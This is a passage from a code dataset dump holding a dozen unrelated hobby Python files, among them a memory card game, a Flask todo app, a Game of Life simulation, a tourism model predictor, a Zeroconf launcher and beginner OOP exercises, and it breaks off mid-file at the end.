game_state[i]['card']\n state1 = game_state[i]['selected'] or game_state[i]['solved']\n\n card2 = game_state[i+1]['card']\n state2 = game_state[i+1]['selected'] or game_state[i+1]['solved']\n\n card3 = game_state[i+2]['card']\n state3 = game_state[i+2]['selected'] or game_state[i+2]['solved']\n\n val1 = get_val_to_print(card1.value) if state1 else \"| ? |\"\n val2 = get_val_to_print(card2.value) if state2 else \"| ? |\"\n val3 = get_val_to_print(card3.value) if state3 else \"| ? |\"\n\n suit1 = get_suit_to_print(card1.suit) if state1 else \"| ? |\"\n suit2 = get_suit_to_print(card2.suit) if state2 else \"| ? |\"\n suit3 = get_suit_to_print(card3.suit) if state3 else \"| ? |\"\n\n\n print(\" -------- \" + \" \" + \" -------- \" + \" \" + \" -------- \")\n print(\"| |\" + \" \" + \"| |\" + \" \" + \"| |\")\n print(val1 + \" \" + val2 + \" \" + val3)\n print(suit1 + \" \" + suit2 + \" \" + suit3)\n print(\"| |\" + \" \" + \"| |\" + \" \" + \"| |\")\n print(\" -------- \" + \" \" + \" -------- \" + \" \" + \" -------- \")\n print(get_card_number(i+1) + \" \" +\n get_card_number(i+2) + \" \" +\n get_card_number(i+3))\n print()\n\n print(\"Num of moves: \" + str(moves))\n\n\ndef main():\n '''Runs the game'''\n game_deck = deck.Deck() # Get a deck of cards\n cards_chosen = [] # a list to draw 6 cards\n\n # Draw 6 cards from the deck\n for _ in range(6):\n card = game_deck.draw_card()\n cards_chosen.append(card)\n cards_chosen.append(card)\n\n # Shuffle them to make sure same 2 cards don't exist together\n random.shuffle(cards_chosen)\n\n game_state = {} # Stores the state of the game\n for idx, card in enumerate(cards_chosen):\n game_state[idx] = {'card': card, 'solved': False,\n 'selected': False}\n\n num_moves = 0 # Track of number of moves\n num_remaning_matches = 6\n\n print(\"***************************************************\")\n print(\"***** Welcome to Memory Game! ******\")\n print(\"***** Select cards between 1-12 and proceed! ******\")\n print(\"***************************************************\")\n print()\n\n while num_remaning_matches > 0:\n show_cards(game_state, num_moves)\n\n card1 = input(\"\\nSelect first card: \")\n card2 = input(\"Select second card: \")\n\n # Check to see if the input is an integer\n # If it is, convert it\n try:\n card1 = int(card1) - 1\n card2 = int(card2) - 1\n except ValueError:\n print(\"Please enter an integer between 1-12 to select a card\")\n continue\n except:\n print(\"Exiting due to unexpected input\")\n break\n\n # If the card is out of range, ask again\n if card1 < 0 or card1 > 11 or card2 < 0 or card2 > 11 or card1 == card2:\n print(\"Invalid card selection. 
Please select a card between 1-12\")\n continue\n\n # If card chosen is already solved, pick again\n if game_state[card1]['solved'] or game_state[card2]['solved']:\n print(\"Please select cards which haven't been seen before\")\n continue\n\n num_moves += 1\n\n # Check if the cards selected are the same\n if game_state[card1]['card'] == game_state[card2]['card']:\n num_remaning_matches -= 1\n game_state[card1]['solved'] = True\n game_state[card2]['solved'] = True\n\n show_cards(game_state, num_moves)\n os.system('clear && printf \\'\\\\e[3J\\'')\n # If the cards are not the same\n else:\n game_state[card1]['selected'] = True\n game_state[card2]['selected'] = True\n\n show_cards(game_state, num_moves)\n\n game_state[card1]['selected'] = False\n game_state[card2]['selected'] = False\n\n time.sleep(4)\n os.system('clear && printf \\'\\\\e[3J\\'')\n\n if num_remaning_matches == 0:\n print(\"You win!\")\n print(\"Num of moves: \" + str(num_moves))\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"pranjalgoel3/Memory-Game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43260876535","text":"from flask import Flask, render_template , Response\t\nfrom flask import request , jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom message import client\nimport json\nimport logging\nimport sys\nfrom flask_heroku import Heroku\n\nimport os\nfrom flask_migrate import Migrate\n\n \n\napp = Flask(__name__)\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:Abcd@123456@localhost/learningflask'\n\n\nheroku= Heroku(app)\ndb = SQLAlchemy(app)\n\n\n\nclass User(db.Model):\n\t__tablename__='tasks'\n\tuid=db.Column(db.Integer, primary_key = True)\n\ttaskname = db.Column(db.String(100))\n\n\tdef __init__(self,taskname):\n\t\tself.taskname=taskname\n\n\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\",User=User.query.all())\n\n@app.route(\"/getdata\", methods=['GET'])\ndef get_User(): \n\tmyuser=User.query.all()\n\tif myuser==\"\":\n\t\treturn 404\n\treturn Response(json.dumps({'taskname':[user.taskname for user in myuser]}), mimetype='application/json')\n\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n\t\n\n\t\ttext=request.form['text']\n\t\tif text !=\"\":\n\t\t\tnewuser = User(text)\n\t\t\tdb.session.add(newuser)\n\t\t\tdb.session.commit()\n\t\t\tmessage = client.messages.create(\n\t\t\tto=\"+15122105811\", \tfrom_=\"+17734327410\" , body =\"A task has been added to your todo list : \"+ text)\n\t\t\tprint(message.sid)\n\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\t\t\t\t\n\t\telse:\t\n\t\t\tnewuser = request.form.getlist('removeId')\n\t\t\tif newuser:\n\t\t\t\tfor n in newuser:\n\t\t\t\t\tUser.query.filter_by(uid=n).delete()\n\t\t\t\tdb.session.commit()\n\t\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\t\t\telse:\n\t\t\t\tedituser = request.form.getlist('editId')\n\t\t\t\tif edituser:\n\t\t\t\t\tupdatedText=request.form['updatedText']\n\t\t\t\t\tfor e in edituser:\n\t\t\t\t\t\tUser.query.filter_by(uid=e).update(dict(taskname=updatedText))\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\t 
\n\t\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR)\n\n","repo_name":"PrasannaInamdar/todolist","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72548565197","text":"#\n# @lc app=leetcode id=202 lang=python3\n#\n# [202] Happy Number\n#\n\n# @lc code=start\nclass Solution:\n def isHappy(self, n: int) -> bool:\n seen = set()\n while n not in seen:\n seen.add(n)\n n = sum([int(i) ** 2 for i in str(n)])\n return n == 1\n\n\n# @lc code=end\n","repo_name":"AllenSun7/LeetCode-Python","sub_path":"202.happy-number.py","file_name":"202.happy-number.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14672648597","text":"# _*_coding:utf-8_*_\nfrom __future__ import annotations\nfrom os import environ\n\nif 'PYGAME_HIDE_SUPPORT_PROMPT' not in environ:\n environ['PYGAME_HIDE_SUPPORT_PROMPT'] = ''\ndel environ\n\nimport pygame\nimport numpy as np\nfrom random import choice\nfrom pygame import Surface\nfrom typing import Optional\nfrom math import floor\n\n\nclass Automaton:\n def __init__(self, type: str, alive: bool) -> None:\n self.alive = alive\n self.type = type\n self.must_die = False\n\n def copy(self) -> Automaton:\n return Automaton(self.type, self.alive)\n\n def update(self) -> None:\n if self.must_die:\n self.alive = False\n self.must_die = False\n else:\n self.alive = True\n\n def draw(self, destiny: Surface, x: int, y: int, size: Optional[int] = 10):\n if self.alive:\n pygame.draw.rect(destiny, (100, 0, 0), (x, y, size, size))\n\n\nclass GridUniverse:\n\n def __init__(self, max_width: int, max_height: int, size: Optional[int] = 10, ignore_edge: Optional[bool] = True) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list = []\n\n self.block_size = size\n self.max_width = max_width\n self.max_height = max_height\n self.ignore_edge = ignore_edge\n self.grid_shift_position = (0, 0)\n self.change_block_size(size, max_width, max_height)\n self.position_neighbors = np.array(\n [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]], dtype=int)\n\n def init_automatons(self) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list.clear()\n for _ in range(self.rows):\n self.automatons_list.append(\n [Automaton('child', False) for _ in range(self.columns)])\n\n def increase_grid(self):\n if self.block_size < 60:\n self.change_block_size(self.block_size + 2)\n\n def decrease_grid(self):\n if self.block_size > 10:\n self.change_block_size(self.block_size - 2)\n\n def change_block_size(self, size: int, width: Optional[int] = None, height: Optional[int] = None) -> None:\n if width is None:\n width = self.max_width\n if height is None:\n height = self.max_height\n (rows, columns) = (int(floor(height / size)), int(floor(width / size)))\n self.rows = rows\n self.columns = columns\n self.height = size * rows\n self.width = size * columns\n self.block_size = size\n self.center_grid()\n self.init_automatons()\n\n def create_automatons(self) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list.clear()\n for i in range(self.rows):\n self.automatons_list.append([])\n for j in range(self.columns):\n self.automatons_list[i].append(\n Automaton(choice(['child', 'adult']), choice([False, True])))\n\n def update_automatons(self) -> None:\n 
for i in range(self.rows):\n for j in range(self.columns):\n count = 0\n automaton = self.automatons_list[i][j]\n for x, y in self.position_neighbors + [i, j]:\n if self.ignore_edge:\n if self.automatons_list[x % self.rows][y % self.columns].alive:\n count += 1\n else:\n if -1 < x < self.rows and -1 < y < self.columns and self.automatons_list[x][y].alive:\n count += 1\n if count == 3 and (not automaton.alive):\n automaton.must_die = False\n automaton.type = 'child'\n elif (count < 2 or count > 3) and automaton.alive:\n automaton.must_die = True\n automaton.type = 'adult'\n elif (1 < count < 4) and automaton.alive:\n automaton.must_die = False\n automaton.type = 'adult'\n else:\n automaton.must_die = True\n self.population_size = 0\n self.geration += 1\n for rows in self.automatons_list:\n for automaton in rows:\n automaton.update()\n if automaton.alive:\n self.population_size += 1\n\n def center_grid(self):\n self.grid_shift_position = (\n (self.max_width - self.width) // 2, (self.max_height - self.height) // 2)\n\n def toogle_automaton(self, row: int, column: int, alive: bool) -> None:\n automaton = self.automatons_list[row][column]\n if alive and not automaton.alive:\n self.population_size += 1\n elif not alive and automaton.alive:\n self.population_size -= 1\n automaton.alive = alive\n automaton.must_die = not alive\n automaton.type = 'adult'\n\n def draw_automatons(self, destiny: Surface) -> None:\n (shift_x, shift_y) = self.grid_shift_position\n if self.height != self.max_height or self.width != self.max_width:\n destiny.fill((0x4B0082))\n\n pygame.draw.rect(destiny, (190, 190, 190), [\n shift_x, shift_y, self.width, self.height])\n\n for i in range(self.rows):\n for j in range(self.columns):\n self.automatons_list[i][j].draw(\n destiny, shift_x + j * self.block_size, shift_y + i * self.block_size, self.block_size)\n\n pygame.draw.line(destiny, (0), (shift_x + j * self.block_size, shift_y),\n (shift_x + j * self.block_size, shift_y + self.rows * self.block_size), 2)\n pygame.draw.line(destiny, (0), (shift_x, shift_y + i * self.block_size),\n (shift_x + self.columns * self.block_size, shift_y + i * self.block_size), 2)\n pygame.draw.line(destiny, (0), (shift_x + self.width, shift_y),\n (shift_x + self.width, shift_y + self.height), 2)\n pygame.draw.line(destiny, (0), (shift_x, shift_y + self.height),\n (shift_x + self.width, shift_y + self.height), 2)\n","repo_name":"FranciscoCharles/conways-game-of-life-in-python","sub_path":"src/life_game.py","file_name":"life_game.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"11158887375","text":"\"\"\"вместо перечисления импорта, можно поставить *(звёздочку)\n и всё импортируется\n ещё один способ импорта через точку, например,\n man = base_person.Person(\"Алекс\", 30, 176)\n \"\"\"\nimport base_person #from base_person import * #Person, Warrior\n\nman = base_person.Person(\"Алекс\", 30, 176)\nman.description_person()\nwarrior = base_person.Warrior(\"Конон\", 35, 200)\nprint(\"Нового человека зовут : \" + warrior.description_person())\n\n# Персонаж (Родительский класс)\n\n# подкласс: Раса (люди, эльфы, гномы, орки)\n# подкласс: Специальность (воин, наг, лучник)\n\n# Родительский класс Персонаж\n\n\n# Подкласс Раса Специальность\n\n# Подкласс подкласса люди эльфы гномы орки воин маг лучник\n\n\n\n","repo_name":"denisofflive/Autotesting_python_selenium_stepik","sub_path":"3. 
Объектно-ориентированное программирование/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40272526031","text":"import sys\ninput = sys.stdin.readline \n\nt = int(input())\n\nfor _ in range(t):\n m, n, x, y = map(int, input().strip().split())\n bool = False\n while(x <= m*n):\n \n if ((x - y) % n == 0):\n print(x)\n bool = True\n break\n x += m\n\n if bool == False:\n print(-1)","repo_name":"Hamkua/Algorithm","sub_path":"백준/Silver/6064. 카잉 달력/카잉 달력.py","file_name":"카잉 달력.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17102915728","text":"import logging\nimport sys\n\nimport pandas as pd\n\nfrom tourism.configuration.s3_operations import S3Operation\nfrom tourism.exception import TourismException\nfrom tourism.utils.main_utils import MainUtils\nfrom tourism.constant import MODEL_FILE_NAME, IO_FILES_BUCKET, ARTIFACTS_DIR\n\nlog_writer = logging.getLogger(__name__)\n\n\nclass TourismData:\n def __init__(\n self,\n Age,\n CityTier,\n DurationOfPitch,\n NumberOfPersonVisiting,\n NumberOfFollowups,\n PreferredPropertyStar,\n NumberOfTrips,\n Passport,\n PitchSatisfactionScore,\n OwnCar,\n NumberOfChildrenVisiting,\n MonthlyIncome,\n TypeofContact,\n Occupation,\n Gender,\n ProductPitched,\n MaritalStatus,\n Designation,\n ):\n\n self.Age = Age\n\n self.CityTier = CityTier\n\n self.DurationOfPitch = DurationOfPitch\n\n self.NumberOfPersonVisiting = NumberOfPersonVisiting\n\n self.NumberOfFollowups = NumberOfFollowups\n\n self.PreferredPropertyStar = PreferredPropertyStar\n\n self.NumberOfTrips = NumberOfTrips\n\n self.Passport = Passport\n\n self.PitchSatisfactionScore = PitchSatisfactionScore\n\n self.OwnCar = OwnCar\n\n self.NumberOfChildrenVisiting = NumberOfChildrenVisiting\n\n self.MonthlyIncome = MonthlyIncome\n\n self.TypeofContact = TypeofContact\n\n self.Occupation = Occupation\n\n self.Gender = Gender\n\n self.ProductPitched = ProductPitched\n\n self.MaritalStatus = MaritalStatus\n\n self.Designation = Designation\n\n def get_tourism_input_data_frame(self):\n\n log_writer.info(\n \"Entered get_tourism_input_data_frame method of TourismData class\"\n )\n\n try:\n Tourism_input_dict = self.get_tourism_as_dict()\n\n log_writer.info(\"Got tourism data as dict\")\n\n log_writer.info(\n \"Exited get_tourism_input_data_frame method of TourismData class\"\n )\n\n return pd.DataFrame(Tourism_input_dict)\n\n except Exception as e:\n raise TourismException(e, sys) from e\n\n def get_tourism_as_dict(self):\n log_writer.info(\"Entered get_tourism_as_dict method of TourismData class\")\n\n try:\n input_data = {\n \"Age\": [self.Age],\n \"CityTier\": [self.CityTier],\n \"DurationOfPitch\": [self.DurationOfPitch],\n \"NumberOfPersonVisiting\": [self.NumberOfPersonVisiting],\n \"NumberOfFollowups\": [self.NumberOfFollowups],\n \"PreferredPropertyStar\": [self.PreferredPropertyStar],\n \"NumberOfTrips\": [self.NumberOfTrips],\n \"Passport\": [self.Passport],\n \"PitchSatisfactionScore\": [self.PitchSatisfactionScore],\n \"OwnCar\": [self.OwnCar],\n \"NumberOfChildrenVisiting\": [self.NumberOfChildrenVisiting],\n \"MonthlyIncome\": [self.MonthlyIncome],\n \"TypeofContact\": [self.TypeofContact],\n \"Occupation\": [self.Occupation],\n \"Gender\": [self.Gender],\n \"ProductPitched\": [self.ProductPitched],\n \"MaritalStatus\": [self.MaritalStatus],\n \"Designation\": 
[self.Designation],\n }\n\n log_writer.info(\"Created tourism data dict\")\n\n input_data = pd.DataFrame(input_data)\n\n log_writer.info(\"Created a dataframe of tourism data\")\n\n log_writer.info(\"Exited get_tourism_as_dict method of TourismData class\")\n\n return input_data\n\n except Exception as e:\n raise TourismException(e, sys) from e\n\n\nclass ModelPredictor:\n def __init__(self):\n self.utils = MainUtils()\n\n self.s3 = S3Operation()\n\n def predict(self, X):\n log_writer.info(\"Entered predict method of ModelPredictor class\")\n\n try:\n best_model = self.s3.load_model(\n MODEL_FILE_NAME, IO_FILES_BUCKET, ARTIFACTS_DIR\n )\n\n log_writer.info(\"Loaded best model from s3 bucket\")\n\n tourism_op = best_model.predict(X)\n\n log_writer.info(\"Used best model to get predictions\")\n\n log_writer.info(\"Exited predict method of ModelPredictor class\")\n\n return tourism_op\n\n except Exception as e:\n raise TourismException(e, sys) from e\n","repo_name":"vishalsingh17/TouristPackagePrediction","sub_path":"tourism/components/model_predictor.py","file_name":"model_predictor.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"42141720955","text":"import hashlib\n\ndef calculate_hash(data):\n sha256 = hashlib.sha256()\n sha256.update(data.encode())\n return sha256.hexdigest()\n\n# Example usage\ndata = \"Hello, blockchain!\"\nhash_value = calculate_hash(data)\nprint(f\"Data: {data}\")\nprint(f\"SHA-256 Hash: {hash_value}\")\n","repo_name":"BenjaminBurton/NetworkP2P","sub_path":"src/protocol/sha.py","file_name":"sha.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39562449261","text":"#!/usr/bin/env python3\n\n# Python standard library imports\nimport weakref\nimport subprocess\nimport json\nimport urllib\n# Imports from external modules\nfrom gi.repository import Gtk\nfrom gi.repository.GdkPixbuf import Pixbuf, PixbufLoader\nfrom zeroconf import ServiceBrowser, Zeroconf\n# Internal modules import\nfrom .mainwindow import MainWindow\n\n\nclass ZeroconfBrowserDelegate:\n\n def is_service_valid(self, info):\n raise NotImplementedError\n\n\nclass ZeroconfListener(object):\n\n def __init__(self, browser):\n self.__browser_ref = weakref.ref(browser)\n\n def add_service(self, zeroconf, service_type, name):\n info = zeroconf.get_service_info(service_type, name)\n self.__browser_ref().add_service(info)\n\n def remove_service(self, _, service_type, name):\n self.__browser_ref().remove_service(service_type, name)\n\n\nclass Application:\n\n DEFAULT_ENCODING = \"utf-8\"\n SERVICE_TYPE_HTTP = \"_http._tcp.local.\"\n KEY_WEB_APP_INFO_PATH = \"net_app_info_path\"\n KEY_WEB_APP_VENDOR_UUID = \"net_app_vendor_uuid\"\n\n COLUMN_PIXEL_BUFFER = 0\n COLUMN_NAME_LABEL = 1\n COLUMN_IDENTIFIER = 2\n\n def __init__(self):\n\n self.__zeroconf = None\n self.__listener = None\n self.__browser = None\n self.__service_dict = {}\n self.__net_app_dict = {}\n self.__is_visible = False\n\n self.__main_window = MainWindow()\n self.__main_window.connect(\"delete-event\", self.on_close_button_clicked)\n\n self.net_apps_list_store = Gtk.ListStore(Pixbuf, str, str)\n self.__main_window.icon_view.set_model(self.net_apps_list_store)\n self.__main_window.icon_view.set_pixbuf_column(0)\n self.__main_window.icon_view.set_text_column(1)\n 
self.__main_window.icon_view.connect(\"item-activated\", self.on_item_activated, self.net_apps_list_store)\n # for i in range(0, 2):\n # pixel_buffer = Gtk.IconTheme.get_default().load_icon(\"package-x-generic\", 64, 0)\n # self.net_apps_list_store.append([pixel_buffer, \"Name label\", \"identifier\"])\n\n # MARK: Application live cycle\n\n def start(self):\n protocol = self.SERVICE_TYPE_HTTP\n self.__zeroconf = Zeroconf()\n self.__listener = ZeroconfListener(self)\n self.__browser = ServiceBrowser(self.__zeroconf, protocol, self.__listener)\n\n self.__main_window.show_all()\n self.__is_visible = True\n Gtk.main()\n\n def stop(self):\n self.__zeroconf.close()\n self.__zeroconf = None\n self.__listener = None\n self.__browser = None\n Gtk.main_quit()\n\n def show_main_window(self):\n if self.__is_visible is False:\n self.__main_window.show()\n self.__is_visible = True\n\n def hide_main_window(self):\n if self.__is_visible is True:\n self.__main_window.hide()\n self.__is_visible = False\n\n # MARK: Zeroconf interface\n\n @classmethod\n def find_list_entry_by_name(cls, model, path, iterator, data):\n if model.get_value(iterator, cls.COLUMN_IDENTIFIER) == data[\"name\"]:\n data[\"iter\"] = iterator\n return True\n else:\n return False\n\n def add_service(self, info):\n if info is None:\n return\n display_name = info.name[:-(len(self.SERVICE_TYPE_HTTP) + 1)]\n self.__service_dict[info.name] = info\n pixel_buffer = Gtk.IconTheme.get_default().load_icon(\"package-x-generic\", 64, 0)\n self.net_apps_list_store.append([pixel_buffer, display_name, info.name])\n self.resolve_service(info)\n\n def download_app_link_resources(self, info, info_uri, info_path):\n ipv4_address = '.'.join(map(str, info.address))\n info_directory = '/'.join(info_path[1:].split('/')[:-1])\n info_directory = '/' + info_directory if len(info_directory) > 0 else info_directory\n port = info.port\n with urllib.request.urlopen(info_uri) as info_response:\n json_string = info_response.read().decode(self.DEFAULT_ENCODING)\n try:\n app_info_dict = json.loads(json_string)\n except json.decoder.JSONDecodeError as e:\n print(\"Could not decode JSON\")\n print(json_string)\n print(e)\n return\n self.__net_app_dict[info.name] = app_info_dict\n icon_file = app_info_dict[\"icon\"][\"64\"]\n app_name = app_info_dict[\"info\"][\"app_name\"]\n self.update_list_store_element(info.name, name_label=app_name)\n try:\n loader = PixbufLoader()\n icon_uri = \"http://{0}:{1}{2}/{3}\".format(ipv4_address, port, info_directory, icon_file)\n response = urllib.request.urlopen(icon_uri)\n loader.write(response.read())\n loader.close()\n self.update_list_store_element(info.name, pixel_buffer=loader.get_pixbuf())\n except:\n print(\"Could not load image:\", icon_uri)\n\n def resolve_service(self, info):\n ipv4_address = '.'.join(map(str, info.address))\n port = info.port\n try:\n info_path = info.properties[self.KEY_WEB_APP_INFO_PATH.encode()].decode(self.DEFAULT_ENCODING)\n except KeyError:\n print(info.name, \"is not a NetApp:\", info)\n else:\n info_path = \"/\" + info_path if info_path[0] != \"/\" else info_path\n info_uri = \"http://{0}:{1}{2}\".format(ipv4_address, port, info_path)\n try:\n self.download_app_link_resources(info, info_uri, info_path)\n except urllib.error.HTTPError as e:\n print(\"Could not download resources\", info_uri, e)\n except urllib.error.URLError as e:\n print(\"Could not download resources\", info_uri, e)\n\n def update_list_store_element(self, name, name_label=None, pixel_buffer=None):\n data = {\"name\": name, \"iter\": 
None}\n self.net_apps_list_store.foreach(self.find_list_entry_by_name, data)\n if data[\"iter\"] is not None:\n if name_label is not None:\n self.net_apps_list_store.set_value(data[\"iter\"], self.COLUMN_NAME_LABEL, name_label)\n if pixel_buffer is not None:\n self.net_apps_list_store.set_value(data[\"iter\"], self.COLUMN_PIXEL_BUFFER, pixel_buffer)\n\n def remove_service(self, _, name):\n data = {\"name\": name, \"iter\": None}\n self.net_apps_list_store.foreach(self.find_list_entry_by_name, data)\n if data[\"iter\"] is not None:\n self.net_apps_list_store.remove(data[\"iter\"])\n del(self.__service_dict[name])\n del(self.__net_app_dict[name])\n\n # MARK: User interface\n\n def on_item_activated(self, icon_view, tree_path, store):\n name = store.get_value(store.get_iter(tree_path), self.COLUMN_IDENTIFIER)\n info = self.__service_dict[name]\n ipv4_address = '.'.join(map(str, info.address))\n port = info.port\n display_uri = \"http://{0}:{1}/\".format(ipv4_address, port)\n command = [\"xdg-open\", display_uri]\n subprocess.call(command)\n print(info)\n icon_view.unselect_all()\n self.hide_main_window()\n\n def on_close_button_clicked(self, widget, args):\n self.stop()\n\n\n\n\n\n\n","repo_name":"chris109b/NetAppLauncher-PyGTK","sub_path":"netapplauncher/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41233178833","text":"from django.http import HttpRequest, JsonResponse\nfrom django.shortcuts import render\nfrom order.models import Order, OrderDetail\nfrom shop.models import ProductList\n\n\ndef add_product(request: HttpRequest):\n product_id = request.GET.get('product_id')\n count = request.GET.get('count')\n if request.user.is_authenticated:\n product = ProductList.objects.filter(id=product_id, is_delete=False, is_active=True).first()\n if product is not None:\n user_order, created = Order.objects.get_or_create(is_order_paid=False, user_id=request.user.id)\n user_order_detail = user_order.orderdetail_set.filter(product_id=product_id).first()\n if user_order_detail is not None:\n user_order_detail.count += int(count)\n user_order_detail.save()\n return JsonResponse({\n 'status': 'success'\n })\n else:\n new_order_detail = OrderDetail(order_id=user_order.id, product_id=product_id, count=count)\n new_order_detail.save()\n else:\n\n return JsonResponse({\n 'status': 'product_not_found'\n })\n else:\n return JsonResponse({\n 'status': 'not_login'\n })\n","repo_name":"pooya13821026/shop","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"3136782828","text":"#!/usr/bin/env python\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndx = 0.01\nmovement_beat_duration = 2.0\nbpm = 60.0\n\ntime_step = 0.05\n\ntf = movement_beat_duration / (bpm / 60.0)\nt = np.arange(0, tf, time_step)\nx = dx * np.sin(2 * math.pi / tf * t)\n\nplt.plot(t, x, 'o')\nplt.show()\n\nfor i in range(len(x)):\n print('[{}, {}, {}, {}, {}, {}, {}],'.format(x[i], 0, 0, 0, 0, 0, 1))\n","repo_name":"introlab/t-top","sub_path":"tools/dance_movement_generators/head_front_back.py","file_name":"head_front_back.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"20775976223","text":"# this program will calculate the 
aggregate for the 22-23 applicants of PU\r\n\r\nmatric = int(input(\"Enter matric marks: \"))\r\ninter = int(input(\"Enter inter marks: \"))\r\nUSAT = int(input(\"Enter USAT marks: \"))\r\n\r\nmatricage = ((matric/1100)*100)\r\ninterage = ((inter/1100)*100)\r\nUSAT = ((USAT/100)*100)\r\n\r\nmerit = ((matricage*0.25) + (interage*0.60) + (USAT*0.15))\r\nprint(\"Your Aggregate for year 2022 in PU is \", merit)","repo_name":"MuhammadTayyab98/Python-Programs","sub_path":"PU Agg Calculator 22.py","file_name":"PU Agg Calculator 22.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34942503454","text":"class Student:\n def __init__(self, name, surname, gender):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.finished_courses = []\n self.courses_in_progress = []\n self.grades = {}\n\n def rate_lecture(self, lecturer, course, grade):\n if isinstance(lecturer, Lecturer) and course in self.courses_in_progress and course in lecturer.courses_attached:\n if course in lecturer.grades:\n lecturer.grades[course] += [grade]\n else:\n lecturer.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def add_courses(self, course_name):\n self.finished_courses.append(course_name)\n\n def average_grade_hw(self, grade):\n all_list_grades = []\n for course in self.grades:\n all_list_grades += self.grades[course]\n return round(sum(all_list_grades) / len(all_list_grades), 2)\n\n def __lt__(self, other):\n if not isinstance(other, Student):\n print('Not a Student')\n return\n return self.average_grade_hw(self.grades) < other.average_grade_hw(other.grades)\n\n def __str__(self):\n courses_all_prgs = ', '\n finished_crs = ', '\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\\nСредняя оценка за домашние задания: \" \\\n f\"{self.average_grade_hw(self.grades)}\\n\" \\\n f\"Курсы в процессе изучения: {courses_all_prgs.join(self.courses_in_progress)}\\n\" \\\n f\"Завершенные курсы: {finished_crs.join(self.finished_courses)}\"\n return res\n\n\nclass Mentor:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n self.grades = {}\n\n def average_grades_lec(self, self_grades):\n all_list_grades = []\n for course in self.grades:\n all_list_grades += self.grades[course]\n return round(sum(all_list_grades) / len(all_list_grades), 2)\n def __lt__(self, other):\n if not isinstance(other, Mentor):\n print('Not a Lecturer')\n return\n return self.average_grades_lec(self.grades) < other.average_grades_lec(self.grades)\n\n def __str__(self):\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\\nСредняя оценка за лекции: {self.average_grades_lec(self.grades)}\"\n return res\n\n\nclass Reviewer(Mentor):\n def rate_hw(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in student.grades:\n student.grades[course] += [grade]\n else:\n student.grades[course] = [grade]\n else:\n return 'Ошибка'\n def __str__(self):\n res = f\"Имя: {self.name}\\nФамилия: {self.surname}\"\n return res\n\n\nbest_student = Student('Ruoy', 'Eman', 'your_gender')\nbest_student.courses_in_progress += ['Python']\nbest_student.finished_courses += ['Ведение в программирование']\n\nany_student = Student('Nikolay', 'Smithov', 'your_gender')\nany_student.courses_in_progress += 
